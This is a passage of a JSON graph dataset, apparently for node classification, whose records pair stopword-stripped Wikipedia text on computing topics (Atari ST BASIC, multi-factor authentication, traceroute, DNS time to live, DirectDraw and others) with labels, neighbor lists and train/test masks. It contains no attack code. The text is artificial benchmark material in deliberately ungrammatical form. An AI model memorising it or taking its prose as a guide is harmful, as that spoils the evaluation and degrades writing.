    "label": 9,
    "text": "Atari_ST_BASIC:atari st basic atari st basic st basic first dialect basic produced atari st line computers bundled new sts early years st lifespan quickly became standard basic platform however many users disliked improved dialects basic quickly came replace atari commissioned metacomco write version basic would take advantage gem environment atari st based version already written digital research called dr-basic bundled dr cp/m-86 operating system result called st basic time st launched st basic bundled new sts port language called abasic ended supplied time amiga commodore quickly replaced microsoft-developed amigabasic user interface consisted four windows edit-window one could enter source code list-window entire source code could browsed command/debug-window instructions entered immediately executed output-window however windows could selected mouse became cumbersome st basic many bugs compute september 1987 reported one flaw described among worst basic bugs time typing codice_1 resulted similar commands codice_2 codice_3 crashed computer magazine described results last command bad crash get st without seeing machine rip free cables drag edge desk leap trash bin citing flaws codice_4 codice_5 equivalent magazine recommended avoid ing st basic serious programming regarding reports metacomco one bug away releasing long-delayed update language jokingly wondered whether atari one bug eliminate st basic one add relatively low quality st basic quickly opened market third-party basics st. fast basic gfa basic two first third-party basics released basics free program written one basics could listed run user basic however compilers run-time executables started appear basics produced executable code could run sts type-in programs became less fashionable longer need standard basic hisoft basic omikron basic stos basic appeared basics even started bundled new sts later years",
    "neighbors": [
      3718,
      7691,
      1805,
      9997,
      786,
      11412,
      22,
      3736,
      3481,
      9881,
      797,
      1952,
      3233,
      11683,
      5925,
      8101,
      4136,
      7849,
      10666,
      8494,
      303,
      7343,
      11315,
      315,
      7355,
      7486,
      7870,
      4160,
      4674,
      10750,
      712,
      847,
      1879,
      92,
      11229,
      2915,
      9188,
      5733,
      2541,
      8429,
      5747,
      759,
      6778,
      6910,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 11244,
    "label": 4,
    "text": "Multi-factor_authentication:multi-factor authentication multi-factor authentication mfa authentication method computer user granted access successfully presenting two pieces evidence factors authentication mechanism knowledge something user user knows possession something user user inherence something user user two-factor authentication also known 2fa type subset multi-factor authentication method confirming users claimed identities using combination two different factors 1 something know 2 something 3 something good example two-factor authentication withdrawing money atm correct combination bank card something user possesses pin something user knows allows transaction carried two examples supplement user-controlled password one-time password otp code generated received authenticator e.g security token smartphone user possesses two-step verification two-step authentication method confirming user claimed identity utilizing something know password second factor something something example second step user repeating back something sent out-of-band mechanism second step might six digit number generated app common user authentication system use multiple authentication factors prove one identity based premise unauthorized actor unlikely able supply factors required access authentication attempt least one components missing supplied incorrectly user identity established sufficient certainty access asset e.g. building data protected multi-factor authentication remains blocked authentication factors multi-factor authentication scheme may include knowledge factors commonly used form authentication form user required prove knowledge secret order authenticate password secret word string characters used user authentication commonly used mechanism authentication many multi-factor authentication techniques rely password one factor authentication variations include longer ones formed multiple words passphrase shorter purely numeric personal identification number pin commonly used atm access traditionally passwords expected memorized many secret questions born poor examples knowledge factor may known wide group people able researched possession factors something user user used authentication centuries form key lock basic principle key embodies secret shared lock key principle underlies possession factor authentication computer systems security token example possession factor disconnected tokens connections client computer typically use built-in screen display generated authentication data manually typed user connected tokens devices physically connected computer used devices transmit data automatically number different types including card readers wireless tags usb tokens software token a.k.a soft token type two-factor authentication security device may used authorize use computer services software tokens stored general-purpose electronic device desktop computer laptop pda mobile phone duplicated contrast hardware tokens credentials stored dedicated hardware device therefore duplicated absent physical invasion device soft token may device user interacts typically x.509v3 certificate loaded onto device stored securely serve purpose factors associated user usually biometric methods including fingerprint face voice iris recognition behavioral biometrics keystroke dynamics also used increasingly fourth factor coming play involving physical location user hard wired corporate network user could allowed login utilizing pin code network entering code soft token well could required could seen acceptable standard access office controlled systems network admission control work similar ways level network access contingent specific network device connected wifi vs wired connectivity also allows user move offices dynamically receive level network access many multi-factor authentication vendors offer mobile phone-based authentication methods include push-based authentication qr code based authentication one-time password authentication event-based time-based sms-based verification sms-based verification suffers security concerns phones cloned apps run several phones cell-phone maintenance personnel read sms texts least cell phones compromised general meaning phone longer something user major drawback authentication including something user possesses user must carry around physical token usb stick bank card key similar practically times loss theft risks many organizations forbid carrying usb electronic devices premises owing malware data theft-risks important machines usb ports reason physical tokens usually scale typically requiring new token new account system procuring subsequently replacing tokens kind involves costs addition inherent conflicts unavoidable trade-offs usability security two-step authentication involving mobile phones smartphones provides alternative dedicated physical devices authenticate people use personal access codes device i.e something individual user knows plus one-time-valid dynamic passcode typically consisting 4 6 digits passcode sent mobile device sms generated one-time passcode-generator app cases advantage using mobile phone need additional dedicated token users tend carry mobile devices around times sms broadly-adopted multi-factor authentication method consumer-facing accounts notwithstanding popularity sms verification security advocates publicly criticized july 2016 united states nist draft guideline proposed deprecating form authentication year later nist reinstated sms verification valid authentication channel finalized guideline 2016 2017 respectively google apple started offering user two-step authentication push notification alternative method security mobile-delivered security tokens fully depends mobile operator operational security easily breached wiretapping sim cloning national security agencies advances research two-factor authentication mobile devices consider different methods second factor implemented posing hindrance user continued use improvements accuracy mobile hardware gps microphone gyro/acceleromoter ability use second factor authentication becoming trustworthy example recording ambient noise user location mobile device comparing recording ambient noise computer room user trying authenticate one able effective second factor authentication also reduces amount time effort needed complete process payment card industry pci data security standard requirement 8.3 requires use mfa remote network access originates outside network card data environment cde beginning pci-dss version 3.2 use mfa required administrative access cde even user within trusted network second payment services directive require strong customer authentication electronic payments european economic area september 14 2019 details authentication federal employees contractors usa defined homeland security presidential directive 12 hspd-12 existing authentication methodologies involve explained three types basic factors authentication methods depend one factor difficult compromise single-factor methods regulatory standards access federal government systems require use multi-factor authentication access sensitive resources example logging network devices perform administrative tasks accessing computer using privileged login nist special publication 800-63-3 discusses various forms two-factor authentication provides guidance using business processes requiring different levels assurance 2005 united states federal financial institutions examination council issued guidance financial institutions recommending financial institutions conduct risk-based assessments evaluate customer awareness programs develop security measures reliably authenticate customers remotely accessing online financial services officially recommending use authentication methods depend one factor specifically user knows determine user identity response publication numerous authentication vendors began improperly promoting challenge-questions secret images knowledge-based methods multi-factor authentication due resulting confusion widespread adoption methods august 15 2006 ffiec published supplemental guidelineswhich states definition true multi-factor authentication system must use distinct instances three factors authentication defined use multiple instances single factor according proponents multi-factor authentication could drastically reduce incidence online identity theft online fraud victim password would longer enough give thief permanent access information however many multi-factor authentication approaches remain vulnerable phishing man-in-the-browser man-in-the-middle attacks multi-factor authentication may ineffective modern threats like atm skimming phishing malware may 2017 o2 telefónica german mobile service provider confirmed cybercriminals exploited ss7 vulnerabilities bypass sms based two-step authentication unauthorized withdrawals users bank accounts criminals first infected account holder computers attempt steal bank account credentials phone numbers attackers purchased access fake telecom provider set-up redirect victim phone number handset controlled finally attackers logged victims online bank accounts requested money accounts withdrawn accounts owned criminals sms passcodes routed phone numbers controlled attackers criminals transferred money many multi-factor authentication products require users deploy client software make multi-factor authentication systems work vendors created separate installation packages network login web access credentials vpn connection credentials products may four five different software packages push client pc order make use token smart card translates four five packages version control performed four five packages check conflicts business applications access operated using web pages possible limit overheads outlined single application multi-factor authentication solutions virtual tokens hardware token products software must installed end users drawbacks multi-factor authentication keeping many approaches becoming widespread consumers difficulty keeping track hardware token usb plug many consumers technical skills needed install client-side software certificate generally multi-factor solutions require additional investment implementation costs maintenance hardware token-based systems proprietary vendors charge annual fee per user deployment hardware tokens logistically challenging hardware tokens may get damaged lost issuance tokens large industries banking even within large enterprises needs managed addition deployment costs multi-factor authentication often carries significant additional support costs 2008 survey 120 u.s. credit unions credit union journal reported support costs associated two-factor authentication report software certificates software toolbar approaches reported highest support costs research deployments multi-factor authentication schemes shown one elements tends impact adoption systems line business organization deploys multi-factor authentication system examples cited include u.s. federal government employs elaborate system physical tokens backed robust public key infrastructure well private banks tend prefer multi-factor authentication schemes customers involve accessible less expensive means identity verification app installed onto customer-owned smartphone despite variations exist among available systems organizations may choose multi-factor authentication system deployed within organization tends remain place users invariably acclimate presence use system embrace time normalized element daily process interaction relevant information system 2013 kim dotcom claimed invented two-factor authentication 2000 patent briefly threatened sue major web services however european patent office revoked patent light earlier 1998 us patent held several popular web services employ multi-factor authentication usually optional feature deactivated default many internet services among google amazon aws use open time-based one-time password algorithm totp support two-step authentication",
    "neighbors": [
      5636,
      10756,
      9745,
      2084,
      3629,
      10801,
      7739,
      9791,
      6220,
      10831,
      7248,
      107,
      9336,
      5245,
      5246,
      10880,
      9356,
      8849,
      10392,
      2213,
      7855,
      2737,
      5813,
      1208,
      3262,
      7368,
      5325,
      6350,
      2262,
      6360,
      6373,
      3309,
      9966,
      10492,
      5373,
      4863,
      2315,
      9488,
      6929,
      8978,
      278,
      4892,
      5404,
      8998,
      3887,
      5433,
      4435,
      857,
      7515,
      4956,
      11619,
      3941,
      4965,
      899,
      1415,
      9607,
      4490,
      3473,
      1945,
      2975,
      6562,
      6563,
      11175,
      939,
      3500,
      9646,
      6064,
      1970,
      11198,
      3521,
      3525,
      9160,
      8657,
      9688,
      10207,
      8176,
      10232,
      2041,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 11245,
    "label": 2,
    "text": "Overlapped_I/O:overlapped i/o overlapped i/o name used asynchronous i/o windows api introduced extension api windows nt utilizing overlapped i/o requires passing overlapped structure api functions normally block including readfile writefile winsock wsasend wsarecv requested operation initiated function call returns immediately completed os background caller may optionally specify win32 event handle raised operation completes alternatively program may receive notification event via i/o completion port preferred method receiving notification used symmetric multiprocessing environments handling i/o large number files sockets so-called overlapped api presents differences depending windows version used asynchronous i/o particularly useful sockets pipes unix linux implement posix asynchronous i/o api aio",
    "neighbors": [
      1577,
      6797,
      11674,
      8976,
      8275,
      5492,
      8499,
      823,
      5754
    ],
    "mask": "None"
  },
  {
    "node_id": 11246,
    "label": 2,
    "text": "Name_Service_Switch:name service switch name service switch nss facility unix-like operating systems provides variety sources common configuration databases name resolution mechanisms sources include local operating system files /etc/passwd /etc/group /etc/hosts domain name system dns network information service nis ldap system administrator usually configures operating system name services using file /etc/nsswitch.conf lists databases passwd shadow group one sources obtaining information examples sources files local files ldap lightweight directory access protocol nis network information service nisplus nis+ wins windows internet name service nsswitch.conf file line entries service consisting database name first field terminated colon list possible source databases mechanisms second field typical file might look like order services listed determines order nss attempt use services resolve queries specified database earlier unix-like systems notable exception ultrix either accessed configuration files hard-coded rules files databases access ultrix offered nearly identical functionality name service switch using configuration file /etc/svc.conf sun microsystems first developed nss solaris operating system subsequently programmers ported many operating systems including freebsd netbsd linux hp-ux irix aix",
    "neighbors": [
      9665,
      7908,
      2887,
      168,
      6888,
      8266,
      7983,
      5397,
      823,
      1304,
      6651,
      700,
      2143
    ],
    "mask": "Train"
  },
  {
    "node_id": 11247,
    "label": 2,
    "text": "DirectDraw:directdraw directdraw ddraw.dll deprecated api used part microsoft directx api directdraw used accelerate rendering 2d graphics applications directdraw also allows applications run fullscreen embedded window ms windows applications directdraw uses hardware acceleration available client computer directdraw allows direct access video memory hardware overlays hardware blitters page flipping video memory manager manipulate video memory ease taking full advantage blitting color decompression capabilities different types display adapters directdraw 2d api contains commands 2d rendering support 3d hardware acceleration programmer could use directdraw draw 3d graphics rendering would slow compared api direct3d support 3d hardware acceleration directdraw introduced windows mobile windows mobile 5.0 replacing graphics component gapi deprecated directdraw deprecated since version 7 directx version 8.0 directdraw merged new package called directx graphics extended direct3d directdraw api additions directdraw still used programmers must use older directx interfaces directx 7 release june 2010 directx sdk package directdraw header file library longer included concurrent deprecation directdraw deterioration windows compatibility old games relied old api command conquer warcraft 2 theme hospital among affected newer windows versions games refuse run 32-bit bit depth others showing black screen glitching switched re-implementation ddraw result vital many communities still hosting games commonly used replacements include",
    "neighbors": [
      10243,
      10769,
      1043,
      1055,
      2083,
      8227,
      1577,
      4143,
      9263,
      11316,
      1077,
      8246,
      4174,
      4178,
      9813,
      603,
      1632,
      2145,
      1656,
      5754,
      9340,
      5761,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      4771,
      7846,
      10414,
      8391,
      214,
      9943,
      9434,
      11487,
      2783,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10989,
      10991,
      2804,
      2308,
      5386,
      6927,
      9491,
      5401,
      4384,
      2854,
      11559,
      10024,
      10026,
      11570,
      2361,
      1348,
      844,
      10079,
      11616,
      2943,
      9609,
      9612,
      9114,
      10654,
      8607,
      10658,
      11683,
      6584,
      2493,
      7629,
      8161,
      6114,
      9196,
      4590,
      3573,
      10229,
      5119
    ],
    "mask": "None"
  },
  {
    "node_id": 11248,
    "label": 4,
    "text": "Microsoft_Forefront_Unified_Access_Gateway:microsoft forefront unified access gateway microsoft forefront unified access gateway uag software suite provides secure remote access corporate networks remote employees business partners services include reverse proxy virtual private network vpn directaccess remote desktop services uag released 2010 successor microsoft intelligent application gateway iag released 2007 uag part microsoft forefront offering microsoft discontinued product 2014 although web application proxy feature windows server 2012 r2 later offers functionalities web application proxy direct feature-for-feature replacement companies like portsys f5 offer direct migration paths uag deployments unified access gateway originally developed startup company named whale communications rosh haayin israel one challenges tried solve 1990s develop remote access solution based vpn mechanism without direct network access remote client corporate network type solution specifically required israeli military government meet national information security standards technology developed called air gap communication external network internal network managed two separate 1u rack-mount servers linked together memory bank accessed scsi interface 18 may 2006 microsoft announced would acquiring whale communications microsoft completed acquisition 26 july 2006 following acquisition product renamed microsoft intelligent application gateway server 2007 version scsi-based air gap dropped product unified single-server appliance instead using air gap security barrier iag used microsoft isa server firewall product iag offered public pre-installed appliance celestix networks ivo networks portsys nappliance 2009 release service pack 2 iag product also offered directly public microsoft form virtual appliance pre-installed vhd could run hyper-v vmware workstation april 2008 microsoft announced next generation iag named forefront unified access gateway product released 24 december 2009 service pack 1 product released 3 december 2010 update 1 service pack 1 released 17 october 2011 service pack 2 product released 6 august 2011 service pack 3 released 19 february 2013 service pack 4 released 27 november 2013 17 december microsoft announced microsoft deliver future full version releases forefront uag product removed price lists 1 july 2014 microsoft uag provides secure socket layer ssl virtual private network vpn web application firewall endpoint security management compliance security enable access control authorization content inspection wide variety line-of-business applications included customized granular access policy security capabilities microsoft exchange server 2003 2007 2010 microsoft sharepoint portal server 2003 2007 2010 microsoft terminal services citrix presentation server product highly customizable almost application published uag box uag server able work many authentication vendors mi-token rsa security onespan gridsure swivel activcard aladdin also works numerous authentication systems protocols active directory radius ldap ntlm lotus domino pki tacacs+ possible customizations include single-sign-on sso well look-and-feel dynamic customization current release uag update 2 product also offers support many third-party systems linux macintosh iphone product also supports mozilla firefox uag performs particularly well providing portal web applications web-based email intranets also provides full ssl vpn network access using either activex using internet explorer java components using firefox opera non windows client red hat mac os components also perform end-point compliance checks allowing access test attributes pc domain name antivirus definitions date running processes inclusion directaccess uag big influence success directaccess provides seamless vpn-like integration high-demand many organizations directaccess part windows uag provides user-friendly configuration interface making easier configure administrators uag also adds two additional components dns64 nat64 make deploying directaccess existing network easier without need deploy ipv6 product sold appliance form vendors ivo networks portsys celestix networks nappliance also offered installable dvd product installed windows server 2008 r2",
    "neighbors": [
      9732,
      2309,
      8584,
      1417,
      10889,
      2443,
      9722,
      8211,
      4760,
      537,
      3482,
      11162,
      3742,
      7838,
      9764,
      5799,
      5673,
      10026,
      4268,
      5677,
      7983,
      7473,
      10417,
      7859,
      2228,
      10675,
      823,
      9655,
      3777,
      5057,
      2884,
      5959,
      8265,
      10828,
      11468,
      6222,
      2383,
      7376,
      11606,
      2136,
      9048,
      5082,
      6490,
      5084,
      6364,
      5470,
      3935,
      9695,
      10210,
      9318,
      8039,
      2154,
      5356,
      9455,
      1776,
      5749,
      3322
    ],
    "mask": "Test"
  },
  {
    "node_id": 11249,
    "label": 4,
    "text": "Traceroute:traceroute computing codice_1 codice_2 computer network diagnostic commands displaying route path measuring transit delays packets across internet protocol ip network history route recorded round-trip times packets received successive host remote node route path sum mean times hop measure total time spent establish connection traceroute proceeds unless three sent packets lost twice connection lost route evaluated ping hand computes final round-trip times destination point internet protocol version 6 ipv6 tool sometimes name traceroute6 tracert6 command codice_1 available many modern operating systems unix-like systems freebsd macos linux available command line tool traceroute also graphically accessible macos within network utilities suite microsoft windows reactos provide program named codice_2 performs route-tracing function windows nt-based operating systems also provide pathping similar functionality reactos version developed ged murphy licensed gpl unix-like operating systems traceroute sends default sequence user datagram protocol udp packets destination port numbers ranging 33434 33534 implementations traceroute shipped linux freebsd netbsd openbsd dragonfly bsd macos include option use icmp echo request packets -i arbitrary protocol -p udp tcp using tcp syn packets icmp windows tracert sends icmp echo request packets rather udp packets traceroute sends default time-to-live ttl value also known hop limit used determining intermediate routers traversed towards destination traceroute sends packets ttl values gradually increase packet packet starting ttl value one routers decrement ttl values packets one routing discard packets whose ttl value reached zero returning icmp error message icmp time exceeded first set packets first router receives packet decrements ttl value drops packet ttl value zero router sends icmp time exceeded message back source next set packets given ttl value two first router forwards packets second router drops replies icmp time exceeded proceeding way traceroute uses returned icmp time exceeded messages build list routers packets traverse destination reached returns icmp destination unreachable message udp packets used icmp echo reply message icmp echo messages used timestamp values returned router along path delay latency values typically measured milliseconds packet sender expects reply within specified number seconds packet acknowledged within expected interval asterisk displayed internet protocol require packets take route towards particular destination thus hosts listed might hosts packets traversed host hop n reply hop skipped output network firewall operates windows unix-like systems one protocol must enabled inbound firewall traceroute work receive replies traceroute implementations use tcp packets tcptraceroute layer four traceroute pathping utility introduced windows nt combines ping traceroute functionality mtr enhanced version icmp traceroute available unix-like windows systems various implementations traceroute rely icmp time exceeded type 11 packets sent source linux tracepath utility similar traceroute primary difference requiring superuser privileges cisco implementation traceroute also uses sequence udp datagrams incrementing ttl values invalid port number remote host default udp port 33434 used extended version command known extended traceroute command change destination port number used udp probe messages implementations include least options specify number queries send per hop time wait response hop limit port use invoking traceroute specified options displays list available options man traceroute presents details including displayed error flags simple example linux example selected options wait three seconds instead five send one query hop instead three limit maximum number hops 16 giving instead 30 example.com final host help identify incorrect routing table definitions firewalls may blocking icmp traffic high port udp unix ping site note firewall may permit icmp packets permit packets protocols traceroute also used penetration testers gather information network infrastructure ip ranges around given host also used downloading data multiple mirrors available piece data one trace mirror get good idea mirror would fastest use traceroute manual page states original traceroute program written van jacobson 1987 suggestion steve deering particularly cogent suggestions fixes c. philip wood tim seaver ken adelman author ping program mike muuss states website traceroute written using kernel icmp support earlier coded enable raw icmp sockets first wrote ping program traceroute limitations well known taken account using tool example traceroute discover paths router level interface level another limitation appears routers respond probes routers limit icmp responses presence traffic load balancing traceroute may indicate path actually exist minimize problem traceroute modification called paris-traceroute maintains flow identifier probes avoid load balancing",
    "neighbors": [
      515,
      516,
      9733,
      9735,
      2568,
      6674,
      8729,
      1580,
      9780,
      3659,
      4174,
      1647,
      9839,
      4725,
      5759,
      8834,
      6281,
      6797,
      4750,
      11413,
      2198,
      4248,
      6812,
      7329,
      4771,
      7847,
      7336,
      3755,
      10924,
      700,
      7356,
      10428,
      8386,
      11464,
      1741,
      1750,
      9946,
      4850,
      7411,
      6396,
      7426,
      1796,
      3845,
      3856,
      8976,
      5397,
      5402,
      808,
      4398,
      7983,
      10033,
      823,
      1336,
      5437,
      7486,
      8517,
      8522,
      6993,
      11607,
      7003,
      5469,
      5470,
      5472,
      6506,
      5492,
      3970,
      10631,
      3976,
      4001,
      418,
      4005,
      7088,
      1978,
      960,
      965,
      10727,
      6120,
      9709,
      2545,
      11250,
      8692,
      9204,
      6138
    ],
    "mask": "Train"
  },
  {
    "node_id": 11250,
    "label": 5,
    "text": "Time_to_live:time live time live ttl hop limit mechanism limits lifespan lifetime data computer network ttl may implemented counter timestamp attached embedded data prescribed event count timespan elapsed data discarded revalidated computer networking ttl prevents data packet circulating indefinitely computing applications ttl commonly used improve performance manage caching data internet protocol ttl 8-bit field ipv4 header ttl 9th octet 20 ipv6 header 8th octet 40 maximum ttl value 255 maximum value single octet recommended initial value 64 time-to-live value thought upper bound time ip datagram exist internet system ttl field set sender datagram reduced every router route destination ttl field reaches zero datagram arrives destination datagram discarded internet control message protocol icmp error datagram 11 time exceeded sent back sender purpose ttl field avoid situation undeliverable datagram keeps circulating internet system system eventually becoming swamped immortals theory ipv4 time live measured seconds although every host passes datagram must reduce ttl least one unit practice ttl field reduced one every hop reflect practice field renamed hop limit ipv6 ttls also occur domain name system dns set authoritative name server particular resource record caching recursive nameserver queries authoritative nameserver resource record cache record time seconds specified ttl stub resolver queries caching nameserver record ttl expired caching server simply reply already cached resource record rather retrieve authoritative nameserver ttl nxdomain non-existent domain responses set minimum minimum field soa record ttl soa indicates long resolver may cache negative answer shorter ttls cause heavier loads authoritative name server useful changing address critical services like web servers mx records therefore often lowered dns administrator prior service moved order reduce possible disruptions units used seconds older common ttl value dns 86400 seconds 24 hours ttl value 86400 would mean dns record changed authoritative nameserver dns servers around world could still showing old value cache 24 hours change newer dns methods part disaster recovery dr system may records deliberately set extremely low ttl example 300-second ttl would help key records expire 5 minutes help ensure records flushed quickly worldwide gives administrators ability edit update records timely manner ttl values per record setting value specific records sometimes honored automatically standard dns systems worldwide however problem persists caching dns nameservers set ttls regardless authoritative records thus guaranteed downstream dns servers new records ttl expired time live may also expressed date time record expires codice_1 header http responses codice_2 header field requests responses codice_3 field http cookies express time-to-live way",
    "neighbors": [
      11,
      2960,
      5402,
      5405,
      3742,
      7965,
      7329,
      2339,
      7336,
      3755,
      4396,
      5166,
      6209,
      2887,
      842,
      3018,
      11094,
      10844,
      5469,
      5470,
      5472,
      225,
      7908,
      11249,
      6514,
      3187,
      8692,
      9339
    ],
    "mask": "None"
  },
  {
    "node_id": 11251,
    "label": 6,
    "text": "Trash_(computing):trash computing computing trash also known recycle bin microsoft windows names operating systems temporary storage files deleted file manager user yet permanently erased file system typically recycle bin presented special file directory user whether actually single directory depends implementation allowing user browse deleted removed files undelete deleted mistake delete permanently either one one empty trash function within trash folder record kept file and/or directory original location certain operating systems files must moved trash accessed whether files deleted program go recycle bin depends level integration particular desktop environment function low-level utilities usually bypass layer entirely delete files immediately program includes file manager functionality may may send files recycle bin may allow user choose options small icon waste container deleting files implemented development apple lisa user interface 1982 called “ wastebasket. ” concept carried apple macintosh “ trash ” except pre-os 9 “ international english ” localization retained “ wastebasket. ” apple inc. sued prevent software companies offering graphical user interfaces similar apple lost claims courts agreed apple trash icon original protected copyright non-apple software may use metaphors file deletion recycle bin smart eraser shredder early versions macintosh finder trash contents listed volatile memory files moved trash would appear finder session ended would automatically erased system 7 released trash became folder retained contents user chose empty trash microsoft first implemented trash concept ms-dos 6 name delete sentry file deleted moved hidden sentry folder root drive microsoft introduced current trash system recycle bin windows 95 area store review files folders prior deletion version original location record file stored folder n't allow subdirectories folder deleted containing files moved bin mixed deleted files directory structure restored batch files undeleted current revised recycle bin allows subdirectory trees exist within folders moved recycle bin functionality usually integrated desktop environment file manager examples include implementations may contain shredding functionality counter data remanence kde gnome xfce implementations comply freedesktop.org trash specification ensuring applications written specification mind interoperable trash implementation although various linux desktop environments gnome kde xfce provide trash mechanism traditionally simple way trash something command line interface third-party applications trash-cli provide commands command-line use trash compatible freedesktop.org trash specification macos file deleted finder moved .trashes folder viewing device available space space occupied deleted files shown occupied macos sierra user turn option trash delete 30 days microsoft recycle bin implemented special folder columns like date deleted original location typically files deleted via file explorer necessarily windows graphical interfaces file selection dialogs put recycle bin files deleted via command prompt permanently deleted default files deleted via operating system apis applications windows explorer operating system apis however allow applications recycle files rather delete previous windows operating systems ms-dos undeletion way recover accidentally intentionally deleted files standard recycle bin stores files deleted hard drives removable media memory cards thumb drives floppy disks store files deleted network drives methods make work network paths however recycle bin setting configure amount deleted files store free disk space allocated actually used files deleted folders stored recycle bin versions windows prior windows vista default configuration recycle bin global setting drives hold 10 total capacity host hard drive volume store deleted files example volume capacity 20 gigabytes recycle bin hold 2 gigabytes deleted files changed anywhere 0 100 drive space allowed exceed 3.99gb space even user-indicated drive space larger 3.99gb recycle bin fills maximum capacity oldest files deleted order accommodate newly deleted files file large recycle bin user prompted immediately permanently delete file instead 3.99gb limit apply windows vista later windows versions actual location recycle bin depends type operating system file system older fat file systems typically windows 98 prior located drive \\recycled ntfs filesystem windows 2000 xp nt drive \\recycler windows vista windows 7 drive recycle.bin folder recycle bin accessed desktop windows explorer typing shell recyclebinfolder run dialog box icon shown default windows xp desktop accessed desktop recycle bin options information different physical recycle bin folders seen partition windows explorer windows xp onwards ntfs different users see contents recycle bins prior windows vista file recycle bin stored physical location renamed original drive letter file original extension hidden file called info2 info windows 95 without windows desktop update stores file original path original name binary format since windows vista meta information file saved number original extension original file renamed r number original extension user views recycle bin files displayed original names file restored recycle bin returned original directory name windows explorer files moved recycle bin number ways possible bypass recycle bin directly delete file holding shift key performing action would normally send file trash apple ’ macos long allowed dragging disk icon trash method unmounting and/or physically ejecting disk place disk trash folder erase disk macos trash icon temporarily changes eject disconnect symbol whenever storage volumes dragged gnome human interface guidelines cite behavior example discouraged metaphor",
    "neighbors": [
      2432,
      6797,
      8080,
      2193,
      4114,
      9249,
      5292,
      7983,
      823,
      576,
      9166,
      9819,
      8540,
      6494,
      2534,
      11368,
      6377,
      10221,
      5619
    ],
    "mask": "None"
  },
  {
    "node_id": 11252,
    "label": 2,
    "text": "Optimus_UI:optimus ui optimus ui front-end touch interface developed lg electronics partners featuring full touch user interface sometimes incorrectly identified operating system optimus ui used internally lg sophisticated feature phones tablet computers available licensing external parties latest version optimus ui 4.1.2 released optimus k ii optimus neo 3 features refined user interface compared previous version 4.1.1 would include voice shutter quick memo optimus ui used devices based android",
    "neighbors": [
      4995,
      5892,
      5637,
      1670,
      7428,
      9610,
      2828,
      5262,
      8719,
      3600,
      10129,
      5522,
      1427,
      7700,
      10645,
      280,
      10009,
      10393,
      7835,
      9244,
      10525,
      798,
      11294,
      288,
      673,
      2978,
      2852,
      8486,
      1191,
      424,
      937,
      1578,
      1959,
      5546,
      5677,
      6057,
      7595,
      10537,
      3380,
      5431,
      1083,
      2875,
      3900,
      10045,
      196,
      69,
      6212,
      8262,
      11082,
      8907,
      332,
      4685,
      3664,
      2001,
      3409,
      2259,
      8019,
      2901,
      8870,
      8280,
      5467,
      8285,
      8413,
      479,
      9949,
      2658,
      3940,
      1255,
      1516,
      5100,
      5613,
      8940,
      5620,
      7548,
      2045,
      11391
    ],
    "mask": "Test"
  },
  {
    "node_id": 11253,
    "label": 9,
    "text": "Elliott_ALGOL:elliott algol elliott algol algol 60 compiler elliott 803 computer implemented tony hoare others differed slightly reference version algol particularly supported character set first released february 1962 believed first implementation algol 60 compiler commercial context unexpectedly popular product company",
    "neighbors": [
      512,
      3716,
      1702,
      8262,
      1610,
      2283
    ],
    "mask": "Validation"
  },
  {
    "node_id": 11254,
    "label": 2,
    "text": "Asphalt_6:_Adrenaline:asphalt 6 adrenaline asphalt 6 adrenaline 2010 racing video game developed published gameloft part asphalt series released ios december 21 2010 mac os x february 17 2011 android june 15 symbian^3 july 20 mobile phones august 31 webos september 3 blackberry playbook october 12 bada 2.0 january 10 2012 gameplay asphalt 6 adrenaline similar asphalt 5 player given option either tilting device touching side screen steer game also multiplayer mode local wi-fi bluetooth global internet connection player acquire five stars race performance based conditions set prior race concerning primary secondary objectives destroying certain number opponents drifting certain amount time new feature asphalt 6 adrenaline mode achieved hitting nitro meter full adrenaline mode player car becomes virtually indestructible ability easily wreck opponents upon slightest contact 42 licensed vehicles available game player starts dmc delorean abarth 500 ss nissan nismo 370z cars motorcycles custom painted tuned vehicles become available player progresses include shelby gt500 ktm x-bow tesla roadster sport audi s5 bmw z4 sdrive35is spyder citroën survolt maserati gran turismo bmw m3 gts ducati hypermotard bentley gt speed lamborghini estoque ferrari california nissan gt-r ducati 1198 ferrari f430 scuderia dodge viper srt10 acr-x ruf rt 12 mercedes-benz slr mclaren stirling moss lamborghini gallardo lp 570-4 superleggera ferrari 458 italia mclaren mp4-12c lamborghini murciélago lp 670-4 sv ruf ctr3 pagani zonda cinque ktm rc8 aston martin one-77 bugatti veyron 16.4 grand sport fastest car available player bentley speed 8 however acceleration bugatti veyron 16.4 grand sport due electronic arts ownership porsche license porsche vehicles although tuned variants ruf locations include nassau chamonix cape town havana new orleans moscow tokyo los angeles reykjavík new york city monte carlo shanghai exclusive android version rio de janeiro detroit hong kong game consists variety events java version asphalt 6 mobile phones consists slightly different gameplay style game consists free play mode well career mode racer must race way across number leagues winning races additional challenges one ultimately become lord asphalt game reaches 100 completion upon release asphalt 6 adrenaline received generally favorable reviews ios version holds aggregate score 79 100 metacritic based thirteen reviews 82 gamerankings based six reviews pocket gamer keith andrew scored game 9 10 arguing overall gameplay second-to-none elements come together – boosting burning bashing racers – asphalt 6 really finds rhythm delivering kind heart-hammering experience usually confined racers adorning big screen living room gameloft limits comes asphalt 6 adrenaline mobile game efforts marry exploits every racing franchise sun ends delivering experience outstrips almost felix xiao appadvice similar reaction praising graphics concluding 're looking action-packed racer pass time look asphalt 6 provide plus much dollars greatly improved artwork another set fantastic rides massive amount gameplay almost guarantee wo n't ever get enough 6.99 asphalt 6 must buy likely remain best arcade racing game time chris hall 148apps also reacted positively awarding score 4.5 5 praising feel game going fast asphalt 6 feels like going really fast engine explodes sound high rpm adrenaline boosts turbo look like straight tron crazy speed effects make game quite entertaining n't go thinking going looking next real racing 2 ... question racing fans get kick asphalt 6 fans arcade racers love bit graphics solid sound good driving mechanics exciting maybe bit forgiving racing sim fans game plain fun like kinds games definitely wo n't regret purchase ign levi buchanan slightly less impressed awarding game score 7.5 10 praising graphics controls arguing asphalt series become somewhat predictable asphalt 6 adrenaline fun arcade racer bunch cars tracks want speed exotic locations game let honest asphalt series starting get really familiar though still reliable fun series needs something next time offer slide play andrew podolsky similar mind ign feeling series become stagnant scoring game 3 4 score awarded asphalt 5 gameloft got us bit bind games consistently push technical limits iphone new iteration long-running series like asphalt looking sounding better one without bit creativity asphalt series starting feel like stuck second gear sixth asphalt game third iphone another brilliant technical achievement environments detailed colorful distinctive detected almost graphical pop-in frame rate slowdown played 4th generation ipod touch time huge leap saw asphalt 5 ... really missing asphalt 6 adrenaline graphical flair well-balanced gameplay progression gameloft 